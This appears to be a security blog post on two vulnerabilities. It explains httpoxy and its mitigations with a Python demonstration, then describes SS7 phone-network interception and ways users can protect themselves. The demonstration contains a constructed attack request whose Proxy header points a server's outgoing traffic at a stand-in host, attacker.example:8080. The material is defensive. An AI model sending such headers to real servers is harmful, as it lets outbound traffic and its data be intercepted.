If you are running your website on a VPS (or any server whose web-server configuration you control), you need to be aware of the httpoxy vulnerability and take immediate steps to mitigate it.
httpoxy is a set of vulnerabilities that affect application code running in CGI or CGI-like environments. It comes down to a simple namespace conflict: RFC 3875 (CGI) puts the HTTP Proxy header from a request into the environment as the variable HTTP_PROXY, and HTTP_PROXY is also a popular environment variable used to configure an outgoing proxy. A remote client can therefore choose the outgoing proxy of any HTTP library that trusts that variable, which makes this a remotely exploitable vulnerability. If you're running PHP or CGI, you should block the Proxy header now.
If a vulnerable HTTP client running inside a server-side CGI application makes an outgoing HTTP connection, an attacker may be able to:
httpoxy is extremely easy to exploit in basic form. Luckily, if you are affected, easy mitigations are available.
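To make the namespace conflict concrete, here is an added Python illustration. It is my own example, not code from httpoxy.org or from any affected library: it implements the RFC 3875 header-to-environment mapping, a stand-in client that trusts HTTP_PROXY the way pre-disclosure libraries did, and the two mitigation points (strip the header in front of CGI, or make the client ignore HTTP_PROXY when REQUEST_METHOD shows it is running under CGI). The hostnames and header values are constructed for the demonstration.

```python
"""Added illustration of the httpoxy namespace conflict and two mitigations.

Not code from httpoxy.org or any affected library. The header mapping
follows RFC 3875 section 4.1.18; the "naive" client stands in for the HTTP
libraries that honoured HTTP_PROXY unconditionally before the disclosure.
"""
from typing import Callable, Dict, Optional


def cgi_environ(headers: Dict[str, str]) -> Dict[str, str]:
    """Map request headers to CGI meta-variables as RFC 3875 prescribes.

    Header 'Foo-Bar' becomes 'HTTP_FOO_BAR'. This is exactly where the
    request's 'Proxy' header collides with the HTTP_PROXY convention.
    """
    env: Dict[str, str] = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def naive_client_proxy(env: Dict[str, str]) -> Optional[str]:
    """Stand-in for a vulnerable HTTP client: it honours HTTP_PROXY wherever
    it runs, so under CGI it obeys whoever sent the request."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def strip_proxy_header(headers: Dict[str, str]) -> Dict[str, str]:
    """Mitigation at the web-server layer: drop the Proxy header before the
    CGI environment is built. Header names are case-insensitive, so the
    comparison is lower-cased. Apache's 'RequestHeader unset Proxy early'
    and nginx's 'fastcgi_param HTTP_PROXY "";' have the same effect."""
    return {k: v for k, v in headers.items() if k.lower() != "proxy"}


def hardened_client_proxy(env: Dict[str, str]) -> Optional[str]:
    """Mitigation inside the client library (the approach Python's urllib
    took): RFC 3875 requires REQUEST_METHOD in every CGI environment, so its
    presence means HTTP_PROXY came from the request. Under CGI only the
    lower-case http_proxy, which the header mapping cannot produce, is
    trusted; outside CGI both spellings are honoured as usual."""
    if "REQUEST_METHOD" in env:
        return env.get("http_proxy")
    return env.get("HTTP_PROXY") or env.get("http_proxy")


# Constructed attacker request for the demonstration (not a real capture).
ATTACK_HEADERS = {
    "Host": "shop.example",
    "Proxy": "http://attacker.example:8080",
}


def outbound_proxy(
    headers: Dict[str, str],
    client: Callable[[Dict[str, str]], Optional[str]],
    mitigated: bool = False,
) -> Optional[str]:
    """Build the CGI environment this request produces and ask the given
    client which proxy it would use for its outgoing connection."""
    if mitigated:
        headers = strip_proxy_header(headers)
    env = cgi_environ(headers)
    env["REQUEST_METHOD"] = "GET"  # always present under CGI
    return client(env)


if __name__ == "__main__":
    print("vulnerable client:", outbound_proxy(ATTACK_HEADERS, naive_client_proxy))
    print("header stripped: ", outbound_proxy(ATTACK_HEADERS, naive_client_proxy, mitigated=True))
    print("hardened client: ", outbound_proxy(ATTACK_HEADERS, hardened_client_proxy))
```

Running it shows the vulnerable client routing its outgoing request through attacker.example:8080, while either mitigation leaves it with no proxy. Strip the header at the front end regardless of which libraries you run: the web-server rule protects every application behind it, whereas the client-side check only protects libraries that have been patched.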
A signalling system called SS7, used by virtually all mobile phone companies worldwide to connect their networks to each other, has a vulnerability that lets cyber criminals and government agencies listen to phone calls, read your texts and find your location just by knowing your phone number, and there is very little that an end user can do to protect themselves against it at the network level. The increasing use of SMS codes to authorise changes to bank accounts and payments, and as the second step of two-step authentication for websites, means that yet another authentication method has been compromised.
SS7 allows mobile phone networks to exchange the information needed for passing calls and text messages between each other and to ensure correct billing. SS7 also allows users on one network to roam on another network or in another country.
Cybercriminals and security agencies can transparently forward calls, giving them the ability to record or listen in to them, read SMS messages sent between phones, and track the location of a phone.
Anyone with a mobile phone could be vulnerable, provided the attacker has gained access to the SS7 system through that person's mobile network or one of the networks connected to it.
Since the security holes within the SS7 system were made public, certain bodies, including the mobile phone operators' trade association, the GSMA, have set up services that monitor the networks for intrusions or abuse of the signalling system.
One of the biggest dangers is the interception of two-step verification codes that are sent via text message as a security measure when logging into websites, email accounts or online banking.
Banks and other secure institutions also use phone calls or text messages to verify a user's identity; these can be intercepted in the same way and therefore lead to fraud or malicious attacks.
There is very little you can do to protect yourself beyond not using the services that ride on the SS7 network. For text messages, avoiding SMS and instead using encrypted messaging services such as Apple's iMessage, Facebook's WhatsApp or the many others available lets you send and receive instant messages without going through the SMS network, which keeps them out of reach of SS7-level interception.
For calls, using a service that carries voice over data rather than through the mobile voice network will help prevent your calls from being snooped on. Messaging services including WhatsApp permit calls, and Silent Circle's end-to-end encrypted Phone service or the open-source Signal app also allow secure voice communications.
Your location can be tracked at any time your mobile phone is on and attached to the mobile network. The only way to avoid this is to turn the phone off, or to turn off its connection to the mobile network and rely on Wi-Fi instead.
Security holes within SS7 were first uncovered by security researchers and demonstrated at the Chaos Communication Congress hacker conference in Hamburg in 2014. In 2015 the hacking of Italian surveillance software vendor Hacking Team highlighted the continuing use of the SS7 system in government and criminal snooping. More recently, German researcher Karsten Nohl remotely surveilled a US congressman in California from Berlin for CBS's 60 Minutes, which has brought SS7 under the spotlight once again. That congressman, Ted Lieu, has called for an oversight committee investigation into the vulnerability.